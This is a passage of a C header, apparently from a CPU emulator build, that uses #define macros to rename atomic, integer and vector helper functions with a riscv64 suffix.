cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_riscv64 #define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_riscv64 #define cpu_stb_data_ra cpu_stb_data_ra_riscv64 #define cpu_stw_data_ra cpu_stw_data_ra_riscv64 #define cpu_stl_data_ra cpu_stl_data_ra_riscv64 #define cpu_stq_data_ra cpu_stq_data_ra_riscv64 #define cpu_stb_data cpu_stb_data_riscv64 #define cpu_stw_data cpu_stw_data_riscv64 #define cpu_stl_data cpu_stl_data_riscv64 #define cpu_stq_data cpu_stq_data_riscv64 #define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_riscv64 #define helper_atomic_xchgb_mmu helper_atomic_xchgb_mmu_riscv64 #define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_riscv64 #define helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_riscv64 #define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_riscv64 #define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_riscv64 #define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_riscv64 #define helper_atomic_and_fetchb_mmu helper_atomic_and_fetchb_mmu_riscv64 #define helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_riscv64 #define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_riscv64 #define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_riscv64 #define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_riscv64 #define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_riscv64 #define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_riscv64 #define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_riscv64 #define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_riscv64 #define helper_atomic_smax_fetchb_mmu helper_atomic_smax_fetchb_mmu_riscv64 #define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_riscv64 #define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_riscv64 #define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_riscv64 #define helper_atomic_fetch_addw_le_mmu helper_atomic_fetch_addw_le_mmu_riscv64 #define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_riscv64 #define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_riscv64 #define helper_atomic_fetch_xorw_le_mmu helper_atomic_fetch_xorw_le_mmu_riscv64 #define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_riscv64 #define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_riscv64 #define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_riscv64 #define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_riscv64 #define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_riscv64 #define helper_atomic_fetch_uminw_le_mmu helper_atomic_fetch_uminw_le_mmu_riscv64 #define helper_atomic_fetch_smaxw_le_mmu helper_atomic_fetch_smaxw_le_mmu_riscv64 #define helper_atomic_fetch_umaxw_le_mmu helper_atomic_fetch_umaxw_le_mmu_riscv64 #define helper_atomic_smin_fetchw_le_mmu helper_atomic_smin_fetchw_le_mmu_riscv64 #define helper_atomic_umin_fetchw_le_mmu helper_atomic_umin_fetchw_le_mmu_riscv64 #define helper_atomic_smax_fetchw_le_mmu helper_atomic_smax_fetchw_le_mmu_riscv64 #define helper_atomic_umax_fetchw_le_mmu helper_atomic_umax_fetchw_le_mmu_riscv64 #define helper_atomic_cmpxchgw_be_mmu helper_atomic_cmpxchgw_be_mmu_riscv64 #define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_riscv64 #define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_riscv64 #define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_riscv64 #define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_riscv64 #define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_riscv64 #define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_riscv64 #define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_riscv64 #define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_riscv64 #define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_riscv64 #define helper_atomic_fetch_smaxw_be_mmu helper_atomic_fetch_smaxw_be_mmu_riscv64 #define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_riscv64 #define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_riscv64 #define helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_riscv64 #define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_riscv64 #define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_riscv64 #define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_riscv64 #define helper_atomic_add_fetchw_be_mmu helper_atomic_add_fetchw_be_mmu_riscv64 #define helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_riscv64 #define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_riscv64 #define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_riscv64 #define helper_atomic_fetch_andl_le_mmu helper_atomic_fetch_andl_le_mmu_riscv64 #define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_riscv64 #define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_riscv64 #define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_riscv64 #define helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_riscv64 #define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_riscv64 #define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_riscv64 #define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_riscv64 #define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_riscv64 #define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_riscv64 #define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_riscv64 #define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_riscv64 #define helper_atomic_umin_fetchl_le_mmu helper_atomic_umin_fetchl_le_mmu_riscv64 #define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_riscv64 #define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_riscv64 #define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_riscv64 #define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_riscv64 #define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_riscv64 #define helper_atomic_fetch_orl_be_mmu helper_atomic_fetch_orl_be_mmu_riscv64 #define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_riscv64 #define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_riscv64 #define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_riscv64 #define helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_riscv64 #define helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_riscv64 #define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_riscv64 #define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_riscv64 #define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_riscv64 #define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_riscv64 #define helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_riscv64 #define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_riscv64 #define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_riscv64 #define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_riscv64 #define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_riscv64 #define helper_atomic_cmpxchgq_le_mmu helper_atomic_cmpxchgq_le_mmu_riscv64 #define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_riscv64 #define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_riscv64 #define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_riscv64 #define helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_riscv64 #define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_riscv64 #define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_riscv64 #define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_riscv64 #define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_riscv64 #define helper_atomic_xor_fetchq_le_mmu helper_atomic_xor_fetchq_le_mmu_riscv64 #define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_riscv64 #define helper_atomic_fetch_uminq_le_mmu helper_atomic_fetch_uminq_le_mmu_riscv64 #define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_riscv64 #define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_riscv64 #define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_riscv64 #define helper_atomic_umin_fetchq_le_mmu helper_atomic_umin_fetchq_le_mmu_riscv64 #define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_riscv64 #define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_riscv64 #define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_riscv64 #define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_riscv64 #define helper_atomic_fetch_andq_be_mmu helper_atomic_fetch_andq_be_mmu_riscv64 #define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_riscv64 #define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_riscv64 #define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_riscv64 #define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_riscv64 #define helper_atomic_xor_fetchq_be_mmu helper_atomic_xor_fetchq_be_mmu_riscv64 #define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_riscv64 #define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_riscv64 #define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_riscv64 #define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_riscv64 #define helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_riscv64 #define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_riscv64 #define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_riscv64 #define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_riscv64 #define helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_riscv64 #define helper_atomic_add_fetchq_be_mmu helper_atomic_add_fetchq_be_mmu_riscv64 #define helper_atomic_cmpxchgb helper_atomic_cmpxchgb_riscv64 #define helper_atomic_xchgb helper_atomic_xchgb_riscv64 #define helper_atomic_fetch_addb helper_atomic_fetch_addb_riscv64 #define helper_atomic_fetch_andb helper_atomic_fetch_andb_riscv64 #define helper_atomic_fetch_orb helper_atomic_fetch_orb_riscv64 #define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_riscv64 #define helper_atomic_add_fetchb helper_atomic_add_fetchb_riscv64 #define helper_atomic_and_fetchb helper_atomic_and_fetchb_riscv64 #define helper_atomic_or_fetchb helper_atomic_or_fetchb_riscv64 #define helper_atomic_xor_fetchb helper_atomic_xor_fetchb_riscv64 #define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_riscv64 #define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_riscv64 #define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_riscv64 #define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_riscv64 #define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_riscv64 #define helper_atomic_umin_fetchb helper_atomic_umin_fetchb_riscv64 #define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_riscv64 #define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_riscv64 #define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_riscv64 #define helper_atomic_xchgw_le helper_atomic_xchgw_le_riscv64 #define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_riscv64 #define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_riscv64 #define helper_atomic_fetch_orw_le helper_atomic_fetch_orw_le_riscv64 #define helper_atomic_fetch_xorw_le helper_atomic_fetch_xorw_le_riscv64 #define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_riscv64 #define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_riscv64 #define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_riscv64 #define helper_atomic_xor_fetchw_le helper_atomic_xor_fetchw_le_riscv64 #define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_riscv64 #define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_riscv64 #define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_riscv64 #define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_riscv64 #define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_riscv64 #define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_riscv64 #define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_riscv64 #define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_riscv64 #define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_riscv64 #define helper_atomic_xchgw_be helper_atomic_xchgw_be_riscv64 #define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_riscv64 #define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_riscv64 #define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_riscv64 #define helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_riscv64 #define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_riscv64 #define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_riscv64 #define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_riscv64 #define helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_riscv64 #define helper_atomic_fetch_smaxw_be helper_atomic_fetch_smaxw_be_riscv64 #define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_riscv64 #define helper_atomic_smin_fetchw_be helper_atomic_smin_fetchw_be_riscv64 #define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_riscv64 #define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_riscv64 #define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_riscv64 #define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_riscv64 #define helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_riscv64 #define helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_riscv64 #define helper_atomic_xchgl_le helper_atomic_xchgl_le_riscv64 #define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_riscv64 #define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_riscv64 #define helper_atomic_fetch_orl_le helper_atomic_fetch_orl_le_riscv64 #define helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_riscv64 #define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_riscv64 #define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_riscv64 #define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_riscv64 #define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_riscv64 #define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_riscv64 #define helper_atomic_fetch_uminl_le helper_atomic_fetch_uminl_le_riscv64 #define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_riscv64 #define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_riscv64 #define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_riscv64 #define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_riscv64 #define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_riscv64 #define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_riscv64 #define helper_atomic_cmpxchgl_be helper_atomic_cmpxchgl_be_riscv64 #define helper_atomic_xchgl_be helper_atomic_xchgl_be_riscv64 #define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_riscv64 #define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_riscv64 #define helper_atomic_fetch_xorl_be helper_atomic_fetch_xorl_be_riscv64 #define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_riscv64 #define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_riscv64 #define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_riscv64 #define helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_riscv64 #define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_riscv64 #define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_riscv64 #define helper_atomic_fetch_umaxl_be helper_atomic_fetch_umaxl_be_riscv64 #define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_riscv64 #define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_riscv64 #define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_riscv64 #define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_riscv64 #define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_riscv64 #define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_riscv64 #define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_riscv64 #define helper_atomic_xchgq_le helper_atomic_xchgq_le_riscv64 #define helper_atomic_fetch_addq_le helper_atomic_fetch_addq_le_riscv64 #define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_riscv64 #define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_riscv64 #define helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_riscv64 #define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_riscv64 #define helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_riscv64 #define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_riscv64 #define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_riscv64 #define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_riscv64 #define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_riscv64 #define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_riscv64 #define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_riscv64 #define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_riscv64 #define helper_atomic_umin_fetchq_le helper_atomic_umin_fetchq_le_riscv64 #define helper_atomic_smax_fetchq_le helper_atomic_smax_fetchq_le_riscv64 #define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_riscv64 #define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_riscv64 #define helper_atomic_xchgq_be helper_atomic_xchgq_be_riscv64 #define helper_atomic_fetch_andq_be helper_atomic_fetch_andq_be_riscv64 #define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_riscv64 #define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_riscv64 #define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_riscv64 #define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_riscv64 #define helper_atomic_xor_fetchq_be helper_atomic_xor_fetchq_be_riscv64 #define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_riscv64 #define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_riscv64 #define helper_atomic_fetch_smaxq_be helper_atomic_fetch_smaxq_be_riscv64 #define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_riscv64 #define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_riscv64 #define helper_atomic_umin_fetchq_be helper_atomic_umin_fetchq_be_riscv64 #define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_riscv64 #define helper_atomic_umax_fetchq_be helper_atomic_umax_fetchq_be_riscv64 #define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_riscv64 #define helper_atomic_add_fetchq_be helper_atomic_add_fetchq_be_riscv64 #define cpu_ldub_code cpu_ldub_code_riscv64 #define cpu_lduw_code cpu_lduw_code_riscv64 #define cpu_ldl_code cpu_ldl_code_riscv64 #define cpu_ldq_code cpu_ldq_code_riscv64 #define helper_div_i32 helper_div_i32_riscv64 #define helper_rem_i32 helper_rem_i32_riscv64 #define helper_divu_i32 helper_divu_i32_riscv64 #define helper_remu_i32 helper_remu_i32_riscv64 #define helper_shl_i64 helper_shl_i64_riscv64 #define helper_shr_i64 helper_shr_i64_riscv64 #define helper_sar_i64 helper_sar_i64_riscv64 #define helper_div_i64 helper_div_i64_riscv64 #define helper_rem_i64 helper_rem_i64_riscv64 #define helper_divu_i64 helper_divu_i64_riscv64 #define helper_remu_i64 helper_remu_i64_riscv64 #define helper_muluh_i64 helper_muluh_i64_riscv64 #define helper_mulsh_i64 helper_mulsh_i64_riscv64 #define helper_clz_i32 helper_clz_i32_riscv64 #define helper_ctz_i32 helper_ctz_i32_riscv64 #define helper_clz_i64 helper_clz_i64_riscv64 #define helper_ctz_i64 helper_ctz_i64_riscv64 #define helper_clrsb_i32 helper_clrsb_i32_riscv64 #define helper_clrsb_i64 helper_clrsb_i64_riscv64 #define helper_ctpop_i32 helper_ctpop_i32_riscv64 #define helper_ctpop_i64 helper_ctpop_i64_riscv64 #define helper_lookup_tb_ptr helper_lookup_tb_ptr_riscv64 #define helper_exit_atomic helper_exit_atomic_riscv64 #define helper_gvec_add8 helper_gvec_add8_riscv64 #define helper_gvec_add16 helper_gvec_add16_riscv64 #define helper_gvec_add32 helper_gvec_add32_riscv64 #define helper_gvec_add64 helper_gvec_add64_riscv64 #define helper_gvec_adds8 helper_gvec_adds8_riscv64 #define helper_gvec_adds16 helper_gvec_adds16_riscv64 #define helper_gvec_adds32 helper_gvec_adds32_riscv64 #define helper_gvec_adds64 helper_gvec_adds64_riscv64 #define helper_gvec_sub8 helper_gvec_sub8_riscv64 #define helper_gvec_sub16 helper_gvec_sub16_riscv64 #define helper_gvec_sub32 helper_gvec_sub32_riscv64 #define helper_gvec_sub64 helper_gvec_sub64_riscv64 #define helper_gvec_subs8 helper_gvec_subs8_riscv64 #define helper_gvec_subs16 helper_gvec_subs16_riscv64 #define helper_gvec_subs32 helper_gvec_subs32_riscv64 #define helper_gvec_subs64 helper_gvec_subs64_riscv64 #define helper_gvec_mul8 helper_gvec_mul8_riscv64 #define helper_gvec_mul16 helper_gvec_mul16_riscv64 #define helper_gvec_mul32 helper_gvec_mul32_riscv64 #define helper_gvec_mul64 helper_gvec_mul64_riscv64 #define helper_gvec_muls8 helper_gvec_muls8_riscv64 #define helper_gvec_muls16 helper_gvec_muls16_riscv64 #define helper_gvec_muls32 helper_gvec_muls32_riscv64 #define helper_gvec_muls64 helper_gvec_muls64_riscv64 #define helper_gvec_neg8 helper_gvec_neg8_riscv64 #define helper_gvec_neg16 helper_gvec_neg16_riscv64 #define helper_gvec_neg32 helper_gvec_neg32_riscv64 #define helper_gvec_neg64 helper_gvec_neg64_riscv64 #define helper_gvec_abs8 helper_gvec_abs8_riscv64 #define helper_gvec_abs16 helper_gvec_abs16_riscv64 #define helper_gvec_abs32 helper_gvec_abs32_riscv64 #define helper_gvec_abs64 helper_gvec_abs64_riscv64 #define helper_gvec_mov helper_gvec_mov_riscv64 #define helper_gvec_dup64 helper_gvec_dup64_riscv64 #define helper_gvec_dup32 helper_gvec_dup32_riscv64 #define helper_gvec_dup16 helper_gvec_dup16_riscv64 #define helper_gvec_dup8 helper_gvec_dup8_riscv64 #define helper_gvec_not helper_gvec_not_riscv64 #define helper_gvec_and helper_gvec_and_riscv64 #define helper_gvec_or helper_gvec_or_riscv64 #define helper_gvec_xor helper_gvec_xor_riscv64 #define helper_gvec_andc helper_gvec_andc_riscv64 #define helper_gvec_orc helper_gvec_orc_riscv64 #define helper_gvec_nand helper_gvec_nand_riscv64 #define helper_gvec_nor helper_gvec_nor_riscv64 #define helper_gvec_eqv helper_gvec_eqv_riscv64 #define helper_gvec_ands helper_gvec_ands_riscv64 #define helper_gvec_xors helper_gvec_xors_riscv64 #define helper_gvec_ors helper_gvec_ors_riscv64 #define helper_gvec_shl8i helper_gvec_shl8i_riscv64 #define helper_gvec_shl16i helper_gvec_shl16i_riscv64 #define helper_gvec_shl32i helper_gvec_shl32i_riscv64 #define helper_gvec_shl64i helper_gvec_shl64i_riscv64 #define helper_gvec_shr8i helper_gvec_shr8i_riscv64 #define helper_gvec_shr16i helper_gvec_shr16i_riscv64 #define helper_gvec_shr32i helper_gvec_shr32i_riscv64 #define helper_gvec_shr64i helper_gvec_shr64i_riscv64 #define helper_gvec_sar8i helper_gvec_sar8i_riscv64 #define helper_gvec_sar16i helper_gvec_sar16i_riscv64 #define helper_gvec_sar32i helper_gvec_sar32i_riscv64 #define helper_gvec_sar64i helper_gvec_sar64i_riscv64 #define helper_gvec_shl8v helper_gvec_shl8v_riscv64 #define helper_gvec_shl16v helper_gvec_shl16v_riscv64 #define helper_gvec_shl32v helper_gvec_shl32v_riscv64 #define helper_gvec_shl64v helper_gvec_shl64v_riscv64 #define helper_gvec_shr8v helper_gvec_shr8v_riscv64 #define helper_gvec_shr16v helper_gvec_shr16v_riscv64 #define helper_gvec_shr32v helper_gvec_shr32v_riscv64 #define helper_gvec_shr64v helper_gvec_shr64v_riscv64 #define helper_gvec_sar8v helper_gvec_sar8v_riscv64 #define helper_gvec_sar16v helper_gvec_sar16v_riscv64 #define helper_gvec_sar32v helper_gvec_sar32v_riscv64 #define helper_gvec_sar64v helper_gvec_sar64v_riscv64 #define helper_gvec_eq8 helper_gvec_eq8_riscv64 #define helper_gvec_ne8 helper_gvec_ne8_riscv64 #define helper_gvec_lt8 helper_gvec_lt8_riscv64 #define helper_gvec_le8 helper_gvec_le8_riscv64 #define helper_gvec_ltu8 helper_gvec_ltu8_riscv64 #define helper_gvec_leu8 helper_gvec_leu8_riscv64 #define helper_gvec_eq16 helper_gvec_eq16_riscv64 #define helper_gvec_ne16 helper_gvec_ne16_riscv64 #define helper_gvec_lt16 helper_gvec_lt16_riscv64 #define helper_gvec_le16 helper_gvec_le16_riscv64 #define helper_gvec_ltu16 helper_gvec_ltu16_riscv64 #define helper_gvec_leu16 helper_gvec_leu16_riscv64 #define helper_gvec_eq32 helper_gvec_eq32_riscv64 #define helper_gvec_ne32 helper_gvec_ne32_riscv64 #define helper_gvec_lt32 helper_gvec_lt32_riscv64 #define helper_gvec_le32 helper_gvec_le32_riscv64 #define helper_gvec_ltu32 helper_gvec_ltu32_riscv64 #define helper_gvec_leu32 helper_gvec_leu32_riscv64 #define helper_gvec_eq64 helper_gvec_eq64_riscv64 #define helper_gvec_ne64 helper_gvec_ne64_riscv64 #define helper_gvec_lt64 helper_gvec_lt64_riscv64 #define helper_gvec_le64 helper_gvec_le64_riscv64 #define helper_gvec_ltu64 helper_gvec_ltu64_riscv64 #define helper_gvec_leu64 helper_gvec_leu64_riscv64 #define helper_gvec_ssadd8 helper_gvec_ssadd8_riscv64 #define helper_gvec_ssadd16 helper_gvec_ssadd16_riscv64 #define helper_gvec_ssadd32 helper_gvec_ssadd32_riscv64 #define helper_gvec_ssadd64 helper_gvec_ssadd64_riscv64 #define helper_gvec_sssub8 helper_gvec_sssub8_riscv64 #define helper_gvec_sssub16 helper_gvec_sssub16_riscv64 #define helper_gvec_sssub32 helper_gvec_sssub32_riscv64 #define helper_gvec_sssub64 helper_gvec_sssub64_riscv64 #define helper_gvec_usadd8 helper_gvec_usadd8_riscv64 #define helper_gvec_usadd16 helper_gvec_usadd16_riscv64 #define helper_gvec_usadd32 helper_gvec_usadd32_riscv64 #define helper_gvec_usadd64 helper_gvec_usadd64_riscv64 #define helper_gvec_ussub8 helper_gvec_ussub8_riscv64 #define helper_gvec_ussub16 helper_gvec_ussub16_riscv64 #define helper_gvec_ussub32 